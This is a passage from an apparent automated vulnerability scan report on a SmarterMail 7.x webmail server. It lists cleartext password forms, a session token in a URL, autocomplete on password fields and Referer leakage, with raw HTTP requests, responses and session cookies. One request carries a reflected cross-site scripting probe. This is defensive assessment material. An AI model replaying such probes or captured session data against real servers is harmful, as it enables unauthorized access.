<td id="ctl00_MPH_wucUserSettings_txtNewPasswordConfirmed_Setting" class="Setting"><input name="ctl00$MPH$wucUserSettings$txtNewPasswordConfirmed_SettingText" type="password" id="ctl00_MPH_wucUserSettings_txtNewPasswordConfirmed_SettingText" class="text" autocomplete="off" /></td>
...[SNIP]...

5.4. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmSmtpAccount.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmSmtpAccount.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /Main/frmSmtpAccount.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:12 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10003
Connection: Close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   SMTP Accounts - hoytllc.
...[SNIP]...
<body class="" dir="ltr">
   <form method="post" action="frmSmtpAccount.aspx" id="aspnetForm">
<div>
...[SNIP]...
<td id="ctl00_MPH_txtPassword_Setting" class="Setting"><input name="ctl00$MPH$txtPassword_SettingText" type="password" id="ctl00_MPH_txtPassword_SettingText" class="text" autocomplete="off" /></td>
...[SNIP]...

6. Session token in URL

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /FileStorageUpload.ashx

Issue detail

The URL in the request appears to contain a session token within the query string:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

POST /FileStorageUpload.ashx?uploadValidationToken=98dee8a7f3fc415c919a873e64836960&pathField=Root+Folder%5c&userField=euser&domainField=hoytllc.com&name=fastdial.net-netsparker.pdf&chunk=1&chunks=3&offset=102400&file_size=224593 HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: keep-alive
Referer: http://vulnerable.SmarterMail 7.x.host:9998/UserControls/ThirdPartyComponents/plupload.flash_1_2_3.swf
content-type: application/octet-stream
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SelectedLanguage=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserStorage"}
Content-Length: 102400

.I^.cw!.%..J..%.|Q..X...[s .\r..%.r.\..OZ.q.4..:......A.>d.yRz....H.$..3s/.4.!.Y.2.9=..^.kr..*c.    8l.5.z.t.}[X........-.
.>..Wr..9...j.[......sXV$..9k.^r..Ir.DH...Y.g.....Cr.J....Q....Sr.^.r.9T....'...
...[SNIP]...

Response

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3925.24451
Date: Sat, 02 Oct 2010 00:11:42 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html
Connection: Close


</pre></table></table></table></table></table></font></font></font></font></font></i></i></i></i></i></b></b></b></b></b></u></u></u></u></u><p>&nbsp;</p><hr>

<html>
<head>
<title
...[SNIP]...

7. Password field with autocomplete enabled
There are 3 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


7.1. http://vulnerable.SmarterMail 7.x.host:9998/Login.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Login.aspx

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /Login.aspx HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: vulnerable.SmarterMail 7.x.host:9998
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:18:49 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 7968


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><ti
...[SNIP]...
<body class="Login" dir="ltr">
   <form method="post" action="Login.aspx" id="aspnetForm">
<div>
...[SNIP]...
</div>
       <input name="ctl00$MPH$txtPassword" type="password" id="ctl00_MPH_txtPassword" tabindex="2" style="width: 310px" />
   </div>
...[SNIP]...

7.2. http://vulnerable.SmarterMail 7.x.host:9998/Login.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Login.aspx

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /Login.aspx?autologin=false HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: vulnerable.SmarterMail 7.x.host:9998
Cookie: SelectedLanguage=; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserEmail"}; ASP.NET_SessionId=soujru3czj1bxs55eeesj055; settings=empty

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:38:11 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 7978


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><ti
...[SNIP]...
<body class="Login" dir="ltr">
   <form method="post" action="Login.aspx?autologin=false" id="aspnetForm">
<div>
...[SNIP]...
</div>
       <input name="ctl00$MPH$txtPassword" type="password" id="ctl00_MPH_txtPassword" tabindex="2" style="width: 310px" />
   </div>
...[SNIP]...

7.3. http://vulnerable.SmarterMail 7.x.host:9998/login.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /login.aspx

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /login.aspx?RedirectUrl=%2fMain%2ffrmStoredFiles.aspx%3fpath%3d4e2dc%3cscript%3ealert(1)%3c%2fscript%3eba99eeeec80 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: vulnerable.SmarterMail 7.x.host:9998
Cookie: SelectedLanguage=; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserEmail"}; ASP.NET_SessionId=soujru3czj1bxs55eeesj055

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:37:54 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 8071


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><ti
...[SNIP]...
<body class="Login" dir="ltr">
   <form method="post" action="login.aspx?RedirectUrl=%2fMain%2ffrmStoredFiles.aspx%3fpath%3d4e2dc%3cscript%3ealert(1)%3c%2fscript%3eba99eeeec80" id="aspnetForm">
<div>
...[SNIP]...
</div>
       <input name="ctl00$MPH$txtPassword" type="password" id="ctl00_MPH_txtPassword" tabindex="2" style="width: 310px" />
   </div>
...[SNIP]...

8. Cross-domain Referer leakage
There are 11 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


8.1. http://vulnerable.SmarterMail 7.x.host:9998/Login.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Login.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /Login.aspx?autologin=false HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: vulnerable.SmarterMail 7.x.host:9998
Cookie: SelectedLanguage=; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserEmail"}; ASP.NET_SessionId=soujru3czj1bxs55eeesj055; settings=empty

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:38:11 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 7978


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><ti
...[SNIP]...
<div class="LoginLinks">
                       <a href='http://www.smartertools.com/smartermail/mail-server-software.aspx' target='_blank'>SmarterMail Free 7.2</a> | <a href='http://www.smartertools.com/smartermail/mail-server-software.aspx' target='_blank'>Windows Mail Server</a> | &copy; 2010 <a href='http://www.smartertools.com/' target='_blank'>SmarterTools Inc.</a>
...[SNIP]...

8.2. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmPrintPreview.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Reports/frmPrintPreview.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /Reports/frmPrintPreview.aspx?level=user&type= HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmReport.aspx?level=user&reportid=3C423C57823C4B519A0426B8EF6C15D5&=MyReports
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:38:59 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2852
Connection: Close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Print Prev
...[SNIP]...
</title>

   <script type="text/javascript" src="http://code.jquery.com/jquery-1.2.6-vsdoc.js"></script>
...[SNIP]...

8.3. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmReport.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Reports/frmReport.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /Reports/frmReport.aspx?level=user&reportid=3C423C57823C4B519A0426B8EF6C15D5&=MyReports HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: keep-alive
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SelectedLanguage=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1293362628","TopBarSection":"UserReports"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 23:12:31 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 27866


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   View Report - hoytllc.co
...[SNIP]...
<div class='ReportChart'><img class='ChartImage' width='700px' height='210px' src='http://174.121.222.18:9998/TempResourceHandler.ashx?file=6960a651633f4a519c9cdf62f3c19135.png' /></div>
...[SNIP]...

8.4. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmReport.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Reports/frmReport.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /Reports/frmReport.aspx?level=user&reportid=3C423C57823C4B519A0426B8EF6C15D5&MyReports HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:38:59 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 27863
Connection: Close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   View Report - hoytllc.co
...[SNIP]...
<div class='ReportChart'><img class='ChartImage' width='700px' height='210px' src='http://174.121.222.18:9998/TempResourceHandler.ashx?file=b4c70133c7824621b9d0132ea6ebfae1.png' /></div>
...[SNIP]...

8.5. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmReport.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Reports/frmReport.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /Reports/frmReport.aspx?level=user&reportid=3C423C57823C4B519A0426B8EF6C15D5&=MyReports HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserReports"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sat, 02 Oct 2010 01:28:48 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 27865


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   View Report - hoytllc.co
...[SNIP]...
<div class='ReportChart'><img class='ChartImage' width='700px' height='210px' src='http://174.121.222.18:9998/TempResourceHandler.ashx?file=694557ada6074a0db34e1b246b74476e.png' /></div>
...[SNIP]...

8.6. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmReport.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Reports/frmReport.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /Reports/frmReport.aspx?level=user&reportid=3C423C57823C4B519A0426B8EF6C15D5&=MyReports HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: keep-alive
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SelectedLanguage=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1541853595","TopBarSection":"UserReports","RootLPSize":300}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sat, 02 Oct 2010 00:24:51 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 27866


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   View Report - hoytllc.co
...[SNIP]...
<div class='ReportChart'><img class='ChartImage' width='700px' height='210px' src='http://174.121.222.18:9998/TempResourceHandler.ashx?file=b98f605d263648818d10f94c6b15a5d5.png' /></div>
...[SNIP]...

8.7. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmReport.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Reports/frmReport.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /Reports/frmReport.aspx?level=user&reportid=3C423C57823C4B519A0426B8EF6C15D5&=MyReports HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserReports"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:21:29 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 27903


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   View Report - hoytllc.co
...[SNIP]...
<div class='ReportChart'><img class='ChartImage' width='700px' height='210px' src='http://174.121.222.18:9998/TempResourceHandler.ashx?file=bec960cfde0a4a9a9a53e02f1bf19d16.png' /></div>
...[SNIP]...

8.8. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmReport.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Reports/frmReport.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /Reports/frmReport.aspx?level=user&reportid=3C423C57823C4B519A0426B8EF6C15D5&=MyReports HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserReports"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sat, 02 Oct 2010 00:52:25 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 27865


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   View Report - hoytllc.co
...[SNIP]...
<div class='ReportChart'><img class='ChartImage' width='700px' height='210px' src='http://174.121.222.18:9998/TempResourceHandler.ashx?file=aedf2a0a2d164f848898a52049f7a417.png' /></div>
...[SNIP]...

8.9. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmReport.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Reports/frmReport.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /Reports/frmReport.aspx?level=user&reportid=3C423C57823C4B519A0426B8EF6C15D5&=MyReports HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserReports"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:58:32 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 27947


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   View Report - hoytllc.co
...[SNIP]...
<div class='ReportChart'><img class='ChartImage' width='700px' height='210px' src='http://174.121.222.18:9998/TempResourceHandler.ashx?file=38a43a866ec9493f98aba52d99b457dd.png' /></div>
...[SNIP]...

8.10. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmAddReportItem.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /UserControls/Popups/frmAddReportItem.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /UserControls/Popups/frmAddReportItem.aspx?level=user& HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmReport.aspx?level=user&reportid=3C423C57823C4B519A0426B8EF6C15D5&=MyReports
